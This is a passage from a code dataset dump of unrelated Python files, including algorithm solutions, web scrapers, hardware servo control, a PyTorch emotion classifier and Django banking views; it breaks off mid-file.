> positive:\r\n print(\"Article sentiment is positive!\")\r\nelse:\r\n print(\"Article sentiment is neutral\")\r\n\r\n","sub_path":"karp.py","file_name":"karp.py","file_ext":"py","file_size_in_byte":7066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"360016508","text":"# BOJ - 8980\nimport sys\nread = sys.stdin.readline\nn, m = map(int, read().split())\narr = [[] for _ in range(n+1)]\nfor _ in range(int(read())):\n a, b, c = map(int, read().split())\n arr[a].append((b, c))\ncap = 0\nans = 0\nl = [0] * (n+1)\nfor i in range(1, n+1):\n ans += l[i]\n cap -= l[i]\n for b, c in sorted(arr[i]):\n if m >= cap + c:\n cap += c\n l[b] += c\n else:\n d = min(m - sum(l[i+1:b+1]), c)\n l[b] += d\n d, cap = max(0, cap + d - m), min(m, cap + d)\n for j in range(n, b, -1):\n if d == 0: break\n if l[j] == 0: continue\n dd = min(d, l[j])\n l[j] -= dd\n d -= dd\nprint(ans)\n\"\"\"\n4 40\n6\n3 4 20\n1 2 10\n1 3 20\n1 4 30\n2 3 10\n2 4 20\n\n4 5\n4\n3 4 1\n2 3 4\n1 2 1\n1 4 4\n\"\"\"","sub_path":"2020/2002/200224.py","file_name":"200224.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"316595948","text":"# coding: utf-8\n'''\na proof of concept implementation of SQLite FTS tokenizers in Python\n'''\nimport sys\nimport ctypes\n\nfrom cffi import FFI # type: ignore\n\nfrom typing import Any, Union, TYPE_CHECKING\n\nif TYPE_CHECKING:\n import sqlite3\n import apsw # type: ignore\nSQLITE3DBHandle = Any # ffi.CData\n\nSQLITE_OK = 0\nSQLITE_DONE = 101\n\nffi = FFI()\n\nif sys.platform == 'win32':\n dll = ffi.dlopen(\"sqlite3.dll\")\nelse:\n from ctypes.util import find_library\n dll = ffi.dlopen(find_library(\"sqlite3\"))\n\nif hasattr(ctypes, 'pythonapi') and \\\n hasattr(ctypes.pythonapi, '_Py_PrintReferences'):\n # for a python built with Py_TRACE_REFS\n ffi.cdef('''\ntypedef struct sqlite3 sqlite3;\ntypedef struct {\n void *_ob_next;\n void *_ob_prev;\n size_t ob_refcnt;\n void *ob_type;\n sqlite3 *db;\n} PyObject;\n''')\nelse:\n ffi.cdef('''\ntypedef struct sqlite3 sqlite3;\ntypedef struct {\n size_t ob_refcnt;\n void *ob_type;\n sqlite3 *db;\n} PyObject;\n''')\n\n\ndef get_db_from_connection(c: 'Union[sqlite3.Connection, apsw.Connection]') -> SQLITE3DBHandle:\n db = getattr(c, '_db', None)\n if db:\n # pypy's SQLite3 connection has _db using cffi\n db = ffi.cast('sqlite3*', db)\n else:\n db = ffi.cast('PyObject *', id(c)).db\n return db\n","sub_path":"sqlitefts/tokenizer.py","file_name":"tokenizer.py","file_ext":"py","file_size_in_byte":1264,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"212952147","text":"import requests\nfrom bs4 import BeautifulSoup as bs\nimport re\nimport csv\nimport pandas as pd\n\nheaders = {'accept': '*/*',\n 'user-agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36'}\n\nptype_url = 'https://kaktus.ua/catalog/prazdniki/novyy-god/elochnye-ukrasheniya/?PAGEN_1=1/'\n\ndef ptype_parse(ptype_url, headers):\n product_urls = []\n urls = []\n urls.append(ptype_url)\n session = requests.Session()\n request = session.get (ptype_url, headers=headers)\n if request.status_code == 200:\n soup = bs(request.content, \"lxml\")\n try:\n pagination = soup.find_all('a', attrs={'class': \"center-back-news\"})\n s = (pagination[-2].text.find(\"-\"))\n p = (pagination[-2].text)\n l = (p[s + 1:len(p) - 2])\n count = int(l)\n for i in range(count):\n url = f'https://kaktus.ua/catalog/prazdniki/novyy-god/elochnye-ukrasheniya/?PAGEN_1={i+1}/'\n #print(url)\n if url not in urls:\n urls.append(url)\n except:\n pass\n for url in urls:\n print(url)\n request = session.get(url, headers=headers)\n soup = bs(request.content, \"lxml\")\n data = soup.find_all('div', class_=\"goods-item cfx\")\n for item in data:\n href = item.find('a', attrs={'href': re.compile(\"^/catalog/\")})['href']\n product_urls.append({\"links\": href})\n else:\n print('ERROR or Done.Status Code = ' + str(request.status_code))\n return product_urls\n\n#def files_writer(product_urls):\n# f = open('text.txt', 'w')\n# urls_unique = pd.DataFrame(product_urls).drop_duplicates().to_dict('records')\n# for product_url in urls_unique:\n# f.write(product_url['links'] + '\\n')\n# f.close()\n\ndef product_parser(product_urls):\n #session = requests.Session()\n urls_unique = pd.DataFrame(product_urls).drop_duplicates().to_dict('records')\n for product_url in urls_unique:\n print('https://kaktus.ua' + product_url['links'])\n # request = session.get('https://kaktus.ua' + product_url['links'], headers=headers)\n # soup = bs(request.content, \"lxml\")\n # data = soup.find_all('div', class_=\"goods-item cfx\")\n # for item in data:\n # href = item.find('a', attrs={'href': re.compile(\"^/catalog/\")})['href']\n # product_urls.append({\"links\": href})\n\n\n\n\nproduct_urls = ptype_parse(ptype_url, headers)\n#files_writer(product_urls)\nproduct_parser(product_urls)\n","sub_path":"ecommerce_scraper.py","file_name":"ecommerce_scraper.py","file_ext":"py","file_size_in_byte":2615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"39010283","text":"def validchar(ch):\n if ch>='0' and ch<='9':\n return True\n if ch=='e' or ch=='.':\n return True\n\ndef removespace(str):\n index = 0\n while index < len(str) and str[index] == ' ':\n index += 1\n return str[index::]\n\ndef isdigit(ch):\n return ch >= '0' and ch <= '9'\n\ndef validstr(str):\n str = removespace(str)\n if len(str) == 0:\n return False\n\n #check first bit\n if not (isdigit(str[0]) or str[0] == '-'):\n return False\n #第一位是负号,第二位是零,第三位只能是小数点\n if len(str)>=3 and str[0] == '-' and str[1] == '0':\n if str[2] != '.':\n return False\n\n #第一位是0,后面只能跟小数点\n if len(str)>=2 and str[0] == '0':\n if str[1] != '.':\n return False\n\n #整数部分一直前进\n index = 0\n if str[0] == '-':\n index += 1\n while index < len(str):\n if not isdigit(str[index]):\n break\n index += 1\n #判断一下跳过整数部分的结果\n if index == len(str):\n return True\n elif not (str[index] == 'e' or str[index]=='.'):\n return False\n\n #遇到小数点,前进过小数部分\n if str[index] == '.':\n index += 1\n has_digit = False\n while index < len(str):\n if not isdigit(str[index]):\n break\n index += 1\n has_digit = True\n if not has_digit:\n return False\n if index == len(str):\n return True\n elif not str[index]=='e':\n return False\n\n #进入指数部分\n index += 1\n has_digit = False\n while index < len(str):\n if not isdigit(str[index]):\n return False\n index += 1\n has_digit = True\n if not has_digit:\n return False\n return True\n\nif __name__ == \"__main__\":\n str = input()\n print(validstr(str))","sub_path":"Code/CodeRecords/2094/61053/279074.py","file_name":"279074.py","file_ext":"py","file_size_in_byte":1895,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"632881494","text":"from time import sleep\n\nfrom adafruit_servokit import ServoKit\n\n# kit = ServoKit(channels=16)\n\n\nclass NotInCorrectRange(Exception):\n pass\n\n\nclass ContinuousRotationServo:\n max_freq = 1900\n min_freq = 1100\n middle_point = (max_freq + min_freq) / 2\n power_multiplier = ((max_freq - min_freq) / 2) / 100\n\n def __init__(self, kit, pin):\n print(\"init\")\n self.control = None\n self.kit = kit\n self.pin = pin\n self.motor_initialize()\n\n def motor_initialize(self):\n # self.control = kit.continuous_servo[self.pin]\n for i in range(0, 10):\n print(\"başlangıç\", i)\n self.run_bidirectional(i)\n sleep(0.1)\n pass\n\n def change_power(self, power):\n \"\"\"\n :param power: this parameter takes a value between -100 and 100. Negative values​make it work backward,\n positive values​make it work forward.\n :return:\n \"\"\"\n self.kit.continuous_servo[self.pin].throttle = power / 100\n\n def run_clockwise(self, power):\n \"\"\"\n Suyu geriye ittirir. Motor ileriye doğru hareket etmek ister.\n :param power:\n :return:\n \"\"\"\n if not 0 <= power <= 100:\n raise NotInCorrectRange(\"Power must be between 0 and 100.\")\n return self.change_power(power)\n\n def run_counterclockwise(self, power):\n \"\"\"\n Suyu ileriye ittirir. Motor geriye doğru hareket etmek ister.\n :param power:\n :return:\n \"\"\"\n if not 0 <= power <= 100:\n raise NotInCorrectRange(\"Power must be between 0 and 100.\")\n return self.change_power(-power)\n\n def run_bidirectional(self, power):\n if power >= 0:\n self.run_clockwise(power)\n else:\n self.run_counterclockwise(-power)\n\n def stop(self):\n return self.change_power(0)\n\n\nif __name__ == '__main__':\n kit = ServoKit(channels=16)\n motor = ContinuousRotationServo(kit, 1)\n max_power = 50\n for i in range(0, max_power):\n print(i)\n motor.run_bidirectional(-i)\n sleep(0.1)\n for i in range(max_power, -max_power, -1):\n print(i)\n motor.run_bidirectional(-i)\n sleep(0.1)\n for i in range(-max_power, 1):\n print(i)\n motor.run_bidirectional(-i)\n sleep(0.1)\n","sub_path":"denemeler/continuous_servo_test.py","file_name":"continuous_servo_test.py","file_ext":"py","file_size_in_byte":2347,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"519083524","text":"import requests\nfrom Class.category import Category\nfrom Class.product import Product\nfrom Class.relation import Relation\n\n\nclass Request:\n \"\"\"class allowing queries with the Open Food Facts API,\n sorting and adding data to the database\"\"\"\n\n def __init__(self):\n \"\"\"builder Request: url and categories\"\"\"\n self.url = \"https://world.openfoodfacts.org/cgi/search.pl?search_terms={}&search_simple=1&page_size=500&action=process&json=1\"\n self.categories = [\n \"Produits fermentés\",\n \"Jus et nectars\",\n \"Gelées de fruits\",\n \"Matières grasses\",\n \"snacks\",\n ]\n\n def create_database(self, database):\n \"\"\"queries, sorting and adding\"\"\"\n print(\"Waiting, request in progress ...\")\n for cat_id, name in enumerate(self.categories):\n n_prod = 0\n n_prod_remove = 0\n n_prod_keep = 0\n cat_id += 1\n category = Category(cat_id, name)\n database.add_category(category.name)\n print(\"------------------------------------------------------\")\n print(category.name, \"...waiting...\")\n print(\"------------------------------------------------------\")\n response = requests.get(self.url.format(name))\n resp = response.json()\n for i in range(500):\n try:\n prod = Product(\n resp[\"products\"][i].get(\"nutrition_grades\", \"0\"),\n resp[\"products\"][i].get(\"_id\", 0),\n resp[\"products\"][i].get(\"product_name_fr\", \"0\"),\n resp[\"products\"][i].get(\"url\", \"absent\"),\n resp[\"products\"][i].get(\"stores\", \"absent\"),\n )\n n_prod += 1\n checkers = [\n 3 * 10 ** 12 < int(prod.barcode) < 8 * 10 ** 12,\n str(prod.name) != \"0\" and str(prod.name) != \"\",\n str(prod.nutriscore) != \"0\",\n ]\n if all(checkers):\n database.add_product(\n (prod.nutriscore).upper(),\n prod.barcode,\n prod.name,\n prod.url,\n prod.market,\n )\n n_prod_keep += 1\n link = Relation(category.cat_id, prod.barcode)\n database.add_relation(link.cat_id, link.barcode)\n else:\n continue\n except IndexError:\n continue\n n_prod_ignore = n_prod - n_prod_keep\n print(f\"{n_prod} products collected.\")\n print(f\"{n_prod_ignore} products ignored.\")\n print(f\"{n_prod_keep} products added.\")\n print(\"Request complete.\")\n","sub_path":"api/Database/request.py","file_name":"request.py","file_ext":"py","file_size_in_byte":2955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"639600737","text":"import requests\nfrom bs4 import BeautifulSoup\n\nmovie_url = input(\"Enter your Movie IMDB URL: \")\npage = requests.get(movie_url)\n\nprint(page)\n\nsoup = BeautifulSoup(page.content, 'html.parser')\n# print(soup)\n#main_top = soup.find(id='main_top')\n# print(main_top)\n\n\nfull_content = soup.find(id=\"wrapper\")\n# Main content\ntitle_bar = full_content.find(class_=\"title_wrapper\")\n# full title bar content\nrating_content = full_content.find(class_='ratings_wrapper')\n# all rating info\nplot_summary = full_content.find(class_='plot_summary')\n#plot_summary = plot_summary_wrapper.find(class_='plot_summary')\n# print(plot_summary)\nstory_line = full_content.find(id='titleStoryLine')\ninline_canwrap = story_line.find(class_='inline canwrap')\n\n\n'''**********************Title and rating ***********************************'''\n# Movie title related all info start:\nvideo_title = title_bar.find('h1').get_text()\n# show video title and publish year\nvideo_info = title_bar.find(class_='subtext')\n# print(video_info)\n# video extra info\nvideo_length = video_info.find('time').get_text()\n# show Total Video Length\n\n\nrelease_date = video_info.find(title=\"See more release dates\").get_text()\n# Movie title related all info end:\n\n'''*******************************Rating ******************************************'''\nrating = rating_content.find(itemprop='ratingValue').get_text()\nbest_rating = rating_content.find(itemprop='bestRating').get_text()\nrating_count = rating_content.find(itemprop='ratingCount').get_text()\n\n'''******************************* Description ****************************************'''\n# Extra info Movie:\ndescription = inline_canwrap.find('span').get_text()\n# Show Description\n\ndirector_info = plot_summary.find_all(class_='credit_summary_item')[0]\ndirector = director_info.find('a').get_text()\n# show director info\n\nwriter_info = plot_summary.find_all(class_='credit_summary_item')[1]\nwriter = writer_info.find('a').get_text()\n# show Writter info\n\nstars_info = plot_summary.find_all(class_='credit_summary_item')[2]\n#stars = stars_info.find('a').get_text()\nlength_stars_name = len(stars_info.find_all('a'))\n# show stars info\n\n\n'''********************************Show All extract Info********************************* '''\n# all print function goes here\nprint(\"Movie Name and Publish Year:\", video_title)\nprint(\"Total Video Length:\", video_length)\nlength_movie_type = len(video_info.find_all('a'))\n#print(\"test:\", length_movie_type)\nfor i in range(length_movie_type-1):\n # video type\n print(\"Movie Type:\", video_info.find_all('a')[i].get_text())\n\nprint(\"Release Date:\", release_date)\nprint(\"Rating:\", rating)\nprint(\"Height Rating:\", best_rating)\nprint(\"Rating Count:\", rating_count)\nprint(\"Description:\", description)\nprint(\"Director:\", director)\nprint(\"Writer:\", writer)\n\n#print(\"Stars:\", length_stars_name)\n\nfor j in range(length_stars_name-1):\n print(\"Stars:\", stars_info.find_all('a')[j].get_text())\n","sub_path":"movies/test_imdb1.py","file_name":"test_imdb1.py","file_ext":"py","file_size_in_byte":2913,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"166352008","text":"#Tenisce Richelieu\n\n#Your algorithm should go here OR you should use comments throughout\n\n#Your code goes here\n #Tenisce Richelieu\nimport tkinter\nimport tkinter.messagebox\n#as box\n\nclass FahrenConverterGUI:\n def __init__(self):\n #Create the main window\n self.main_window = tkinter.Tk()\n\n #Create two frames to group widgets\n self.top_frame = tkinter.Frame(self.main_window)\n self.bottom_frame = tkinter.Frame(self.main_window)\n\n #Create widgets for the top frame we need a prompt label and an entry box\n self.prompt_label = tkinter.Label(self.top_frame, text = \"Enter a Fahrenheit temp: \")\n self.f_entry = tkinter.Entry(self.top_frame, width = 10)\n\n #Pack the top frame's widgets TOP FRAME, pack both widgets in the frame, create widgets for the bottom frame\n self.prompt_label.pack(side = 'left')\n self.f_entry.pack(side = 'left')\n self.calc_button = tkinter.Button(self.bottom_frame, text = \"Calculate\", command = self.convert)\n self.quit_button = tkinter.Button(self.bottom_frame, text = 'Quit', command = self.main_window.destroy)\n\n #Pack the button frame's widgets\n self.calc_button.pack(side = 'left')\n self.quit_button.pack(side = 'left')\n\n #Pack the frames\n self.top_frame.pack()\n self.bottom_frame.pack()\n \n def convert(self):\n #Get the value entered by the user into the f widget\n f = float(self.f_entry.get())\n\n #Convert fahrenheit to celcius\n c = (f - 32) * 5/9\n\n #Display the results in an info dialog box\n tkinter.messagebox.showinfo('Results', str(f) + ' Fahrenheit is equal to ' + str(c) + ' Celcius.')\n \ntemp_converter = FahrenConverterGUI()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"556451427","text":"#!/usr/bin/env python3\n\"\"\"\nAuthor : Sarah Abney\nDate : 5 Feburary 2020\nPurpose: Homework 1 \n\"\"\"\n\nimport argparse\nimport os\nimport sys\n\n\n\n# --------------------------------------------------\ndef get_args():\n \"\"\"Get arguments\"\"\"\n\n parser = argparse.ArgumentParser(\n description=\"Homework1\",\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n\n parser.add_argument('vowel', \n metavar='vowel',\n help='vowel = A vowel to search for', \n type=str, \n choices= ['a', 'e', 'i', 'o', 'u', 'A', 'E', 'I', 'O', 'U'])\n\n parser.add_argument('text',\n metavar='text',\n help='text= The text to show')\n\n return parser.parse_args()\n\n\n# --------------------------------------------------\ndef main():\n \"\"\"The fun stuff\"\"\"\n\n args = get_args()\n text = args.text\n vowel = args.vowel\n \n if vowel in text:\n print(f'Found \"{vowel}\" in \"{text}\" at index {text.index(vowel)}.')\n else: \n print(f'\"{vowel}\" is not found in \"{text}\".')\n \n# --------------------------------------------------\nif __name__ == '__main__':\n main()\n","sub_path":"assignments/01_strings/vpos.py","file_name":"vpos.py","file_ext":"py","file_size_in_byte":1208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"546848825","text":"from pydash import *\n\nf = open('d.txt')\n\nL = []\n\nread_lines = f.readlines()\nfor line in read_lines:\n L.append(str(line).replace('\\n', '').split(' '))\n\nf.close()\n\n\nnew_L = []\nfor i in range(int(L[0][1])):\n for line in L[1:]:\n if line[1] == str(i):\n new_L.append(line)\nnew_L\n\nnum_nodes = map_(new_L, lambda x: x[1])\nnodes = []\n\nfor n in range(int(L[0][1])):\n nodes.append([n, num_nodes.count(str(n))])\n\n\nant = 0\ntmp = 0\nstring_da_vitoria = str(L[0][1]) + \"\\n\"\n\n\nfor i in range(len(nodes)):\n string_da_vitoria += str(nodes[i][0]) + \"\\n\" + str(nodes[i][1]) + \"\\n\"\n for line in new_L[ant:ant+nodes[i][1]]: \n string_da_vitoria += line[2] + \" 1\\n\"\n ant += nodes[i][1]\n\nfile_vitoria = open(\"d_submission.txt\", \"w\")\nfile_vitoria.write(string_da_vitoria)\nfile_vitoria.close()","sub_path":"solutions/d_code.py","file_name":"d_code.py","file_ext":"py","file_size_in_byte":782,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"631239742","text":"# -*- coding: utf-8 -*-\n# 단어 입력받는다 (1,000,000 넘지않는 단어)\nverb = input()\nif len(verb) > 1000000:\n print(\"입력길이 초과\")\n exit()\n\n# 알파벳:카운트의 해쉬를 생성해서 각자 카운트한다.\nalphabet = dict()\nfor i in range(97, 123):\n alphabet[chr(i)] = 0\n\nfor i in list(verb.lower()):\n alphabet[i] += 1\n\nret = 0\ncol = 0\nfor y in alphabet:\n if ret < alphabet[y]:\n ret = alphabet[y]\n col = y.upper()\n elif ret == alphabet[y]:\n col = '?'\n\nprint(col)","sub_path":"baekjoon/1157-단어공부/jhwmon.py","file_name":"jhwmon.py","file_ext":"py","file_size_in_byte":526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"61137263","text":"import os\nimport pandas as pd \nimport glob\nimport matplotlib.pyplot as plt\nimport time\nimport numpy as np\nimport pickle\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.autograd import Variable\nimport torch.optim as optim\n\n# Load audio MFCC\nMFCC = (np.load(\"FC_MFCC12EDA.npy\")).transpose(0,2,1) # Transpose\ndata_train = MFCC[0:int(MFCC.shape[0]*0.9)]\ndata_test = MFCC[int(MFCC.shape[0]*0.9):]\n# Load label\nfile=open(\"FC_label.txt\")\nlines=file.readlines()\nlabel = []\nfor line in lines:\n line = line.strip().split('\\n')\n label.append(line)\nlabel_int = (np.array(label)[:,0]).astype(int)\nlabel_train = label_int[0:int(MFCC.shape[0]*0.9)]\nlabel_test = label_int[int(MFCC.shape[0]*0.9):]\naudio_data_train_tensor = Variable(torch.tensor(data_train),requires_grad = False)\naudio_data_test_tensor = Variable(torch.tensor(data_test),requires_grad = False)\naudio_label_train_tensor = Variable(torch.tensor(label_train),requires_grad = False)\naudio_label_test_tensor = Variable(torch.tensor(label_test),requires_grad = False)\n\nimport pandas as pd\nimport tensorflow as tf\nimport numpy as np\nfrom tensorflow.keras.preprocessing.text import Tokenizer\nfrom tensorflow.keras.preprocessing.sequence import pad_sequences\ndata = pd.read_csv(\"sentence_label_comb.csv\").dropna().reset_index(drop=True)\nsentence_length = []\nfor i in range(len(data)):\n length = len(data.sentence[i].split())\n sentence_length.append(length)\n\nsentence = []\nlabel = []\nfor i in range(len(data)):\n sentence.append(data.sentence[i])\n label.append(data.label[i])\n \n#train_sentence = sentence[0: int(len(data)*0.6)]\n#train_label = label[0: int(len(data)*0.6)]\n\n#val_sentence = sentence[int(len(data)*0.6):int(len(data)*0.8)]\n#val_label = label[int(len(data)*0.6):int(len(data)*0.8)]\n\ntrain_sentence = sentence[0: int(len(data)*0.9)]\ntrain_label = label[0: int(len(data)*0.9)]\n\ntest_sentence = sentence[int(len(data)*0.9):]\ntest_label = label[int(len(data)*0.9):]\n\nvocab_list = []\nfor i in sentence:\n for j in i.split():\n if j not in vocab_list:\n vocab_list.append(j)\n# len(vocab_list)\n# 3147\n# since the vocabulary size of the sentence is 3147, so I would pick the \n# 3000 most common words\ntokenizer = Tokenizer(num_words=3000, oov_token='')\ntokenizer.fit_on_texts(train_sentence)\nword_index = tokenizer.word_index\n\ntrain_sequence = tokenizer.texts_to_sequences(train_sentence)\ntrain_sequence = pad_sequences(train_sequence, maxlen = 35, padding='post', truncating='post')\n\n#val_sequence = tokenizer.texts_to_sequences(val_sentence)\n#val_sequence = pad_sequences(val_sequence, maxlen = 35, padding='post', truncating='post')\n\ntest_sequence = tokenizer.texts_to_sequences(test_sentence)\ntest_sequence = pad_sequences(test_sequence, maxlen = 35, padding='post', truncating='post')\n\ntext_data_train_tensor = Variable(torch.tensor(train_sequence),requires_grad = False)\ntext_label_train_tensor = Variable(torch.tensor(train_label),requires_grad = False)\ntext_data_test_tensor = Variable(torch.tensor(test_sequence),requires_grad = False)\ntext_label_test_tensor = Variable(torch.tensor(test_label),requires_grad = False)\n\nclass model(nn.Module):\n def __init__(self):\n super(model, self).__init__()\n \n self.conv0 = nn.Sequential(nn.Conv1d(in_channels=39, out_channels=10, kernel_size = 4),nn.ReLU())\n self.lstm_audio = nn.LSTM(input_size=10, hidden_size=16, batch_first = True, bidirectional = True)\n self.fc0 = nn.Sequential(nn.Flatten(start_dim = 1, end_dim = -1),nn.Linear(in_features = 23904, out_features = 4))\n \n vocab_size = 3000\n embedding_dim = 64\n self.embedding1 = nn.Embedding(vocab_size, embedding_dim)\n self.lstm1 = nn.LSTM(input_size = embedding_dim, hidden_size = 100,\n dropout = 0.2, bidirectional = True, batch_first=True)\n self.dropout1 = nn.Dropout(0.3)\n self.fc1 = nn.Sequential(\n nn.Flatten(start_dim = 1, end_dim = -1),\n nn.Linear(in_features = 3500*2, out_features = 4)\n )\n self.final = nn.Sequential(nn.Linear(in_features = 8, out_features = 4), nn.Softmax(dim =1))\n \n def forward(self,x,y):\n Conv_out0 = self.conv0(x)\n LSTM_out0,_ = self.lstm_audio(Conv_out0.transpose(1,2))\n FC_out0 = self.fc0(LSTM_out0)\n y = y.long()\n embeds1 = self.embedding1(y)\n lstm_out1, _ = self.lstm1(embeds1)\n drop_out1 = self.dropout1(lstm_out1)\n FC_out1 = self.fc1(drop_out1)\n final_input = torch.cat((FC_out0, FC_out1), dim=1)\n output = self.final(final_input)\n #output = nn.Linear(final_input, out_features=4)\n return output\n\nModel_r = model()\nModel_r.load_state_dict(torch.load('model_trained.pkl')) \nModel_r.eval()\noutputs = Model_r(audio_data_test_tensor.float(),text_data_test_tensor)\n_, y_pred = outputs.max(dim=1)\naccuracy = int(sum(y_pred == audio_label_test_tensor))/len(text_label_test_tensor)\nprint(\"test accuray: {:.2f}\".format(accuracy))\nmat = np.zeros(shape=(4,4))\nmat_new = np.zeros(shape=(4,4))\nfor i in range(0,len(text_label_test_tensor)):\n m = text_label_test_tensor[i]\n n = y_pred[i]\n mat[m,n] = mat[m,n] + 1\n\nfor i in range(4):\n mat[i,:] = mat[i,:]/sum(mat[i,:])\nimport seaborn as sns\nimport matplotlib as mpl\nsns.set(style = \"whitegrid\",color_codes = True)\n#np.random.seed(sum(map(ord,\"categorical\")))\n#df_corr = someDataFrame.corr()\nax = sns.heatmap(mat, annot=True) #notation: \"annot\" not \"annote\"\nbottom, top = ax.get_ylim()\nax.set_ylim(bottom + 0.5, top - 0.5)\n#heatmap = sns.heatmap(mat,annot = True)\nplt.show()\n#accuracy = int(sum(y_pred == audio_label_test_tensor))/len(text_label_test_tensor)\n#print(\"test accuray: {:.2f}\".format(accuracy))\n","sub_path":"ATM_test.py","file_name":"ATM_test.py","file_ext":"py","file_size_in_byte":5759,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"290973456","text":"# Create your views here.\nfrom django.shortcuts import render_to_response\nfrom cooperative_Bank.financial_management.models import account\nfrom cooperative_Bank.financial_management.models import Customer\nfrom cooperative_Bank.financial_management.models import MutualFund\nfrom cooperative_Bank.financial_management.models import IPO\nfrom cooperative_Bank.financial_management.models import FO\nfrom django.http import HttpResponseRedirect\nfrom django.template import RequestContext\nfrom django.http import HttpResponse\nfrom django.utils import simplejson\n\nuser_name = None\nuser_id1 = None\ntot_bal1= None\nmf_bal1= None\npo_bal1= None\nfo_bal1= None\nnw_bal1= None\nmfid=None\np=None\ncounter=None\nquantity=None\nprice=None\ntotal=None\n#def print_vars():\n# print user_name\n# print user_id1\n# print tot_bal1\n# print mf_bal1\n# print po_bal1\n# print fo_bal1\n# print nw_bal1\n\ndef login_page(request):\n return render_to_response(\"login.html\")\n\ndef account_detail(request):\n user_id = request.POST[\"user_id\"] \n try: \n global user_name\n global user_id1 \n global tot_bal1\n global mf_bal1\n global po_bal1\n global fo_bal1\n global nw_bal1\n user = account.objects.get(pk=user_id)\n customer = Customer.objects.get(pk=user_id)\n user_name = customer.customer_Name\n user_id1 = user.user_id\n tot_bal1= int(user.tot_bal)\n mf_bal1= int(user.mf_bal)\n po_bal1= int(user.po_bal)\n fo_bal1= int(user.fo_bal)\n nw_bal1 =(tot_bal1)-(mf_bal1+po_bal1+fo_bal1)\n return render_to_response(\"accountpage.html\",{\"user_id1\":user_id1 , \"mf_bal1\":mf_bal1 , \"tot_bal1\":tot_bal1 , \"po_bal1\":po_bal1 ,\"fo_bal1\": fo_bal1, \"user_name\":user_name,\"nw_bal1\":nw_bal1})\n\n except account.DoesNotExist:\n return HttpResponseRedirect(\"/cooperative_Bank/\")\n\n \n##if view is MF show him MF page ,IPO show ipo.htm, FO fo.html else error\ndef mf_detail(request):\n global user_name\n global user_id1 \n global tot_bal1\n global mf_bal1\n global po_bal1\n global fo_bal1\n global nw_bal1\n global mfid\n global p\n counter = 0\n mf_list = MutualFund.objects.all()\n return render_to_response('mf.html',{'mf_list':mf_list,\"user_name\":user_name ,\"tot_bal1\":tot_bal1 , \"mf_bal1\":mf_bal1 ,\"nw_bal1\":nw_bal1,\"mfid\":mfid,\"p\":p,\"counter\":counter})\n\ndef ipo_detail(request):\n global user_name\n global user_id1 \n global tot_bal1\n global mf_bal1\n global po_bal1\n global fo_bal1\n global nw_bal1\n\n ipo_list = IPO.objects.all()\n return render_to_response('ipo.html',{'ipo_list':ipo_list,\"user_name\":user_name ,\"tot_bal1\":tot_bal1 , \"po_bal1\":po_bal1 ,\"nw_bal1\":nw_bal1,})\n \ndef fo_detail(request):\n global user_name\n global user_id1 \n global tot_bal1\n global mf_bal1\n global po_bal1\n global fo_bal1\n global nw_bal1\n\n fo_list = FO.objects.all()\n return render_to_response('fo.html',{'fo_list':fo_list,\"user_name\":user_name ,\"tot_bal1\":tot_bal1 , \"fo_bal1\":fo_bal1 ,\"nw_bal1\":nw_bal1,})\ndef thank_detail(request):\n global user_name\n global user_id1 \n global tot_bal1\n global mf_bal1\n global po_bal1\n global fo_bal1\n global nw_bal1\n global mfid\n global quantity\n global price\n global total\n i=0\n counter=0\n user = account.objects.get(pk=user_id1)\n mfid = request.POST[\"abc1\"]\n p = MutualFund.objects.get(pk=mfid)\n mf_list = MutualFund.objects.all()\n fo_list = FO.objects.all()\n for mf in mf_list:\n i=i+1\n mfid = request.POST[\"abc\"+str(i)]\n quantity = request.POST[\"abcd\"+str(i)]\n if quantity!=\"\":\n p = MutualFund.objects.get(pk=mfid)\n price=int(p.mf_cost)\n total=price*int(quantity)\n if int(quantity)<=int(p.mf_Qty):\n if total<=mf_bal1:\n user.mf_bal=int(user.mf_bal)-total\n user.tot_bal=int(user.tot_bal)-total\n user.save()\n p.mf_Qty=int(p.mf_Qty)-int(quantity)\n p.save()\n counter=1\n mf_bal1=user.mf_bal \n quantity=p.mf_Qty\n \n return render_to_response('Thank.html',{'fo_list':fo_list,\"user_name\":user_name ,\"tot_bal1\":tot_bal1 , \"fo_bal1\":fo_bal1 ,\"nw_bal1\":nw_bal1,\"user_id1\":user_id1,\"total\":total,\"counter\":counter,\"mf_bal1\":mf_bal1,\"quantity\":quantity})\n\ndef thank1_detail(request):\n global user_name\n global user_id1 \n global tot_bal1\n global mf_bal1\n global po_bal1\n global fo_bal1\n global nw_bal1\n global mfid\n global quantity\n global price\n global total\n i=0\n counter=0\n user = account.objects.get(pk=user_id1)\n mfid = request.POST[\"abc1\"]\n p = IPO.objects.get(pk=mfid)\n ipo_list = IPO.objects.all()\n fo_list = FO.objects.all()\n for ipo in ipo_list:\n i=i+1\n mfid = request.POST[\"abc\"+str(i)]\n quantity = request.POST[\"abcd\"+str(i)]\n if quantity!=\"\":\n p = IPO.objects.get(pk=mfid)\n price=int(p.ipo_cost)\n 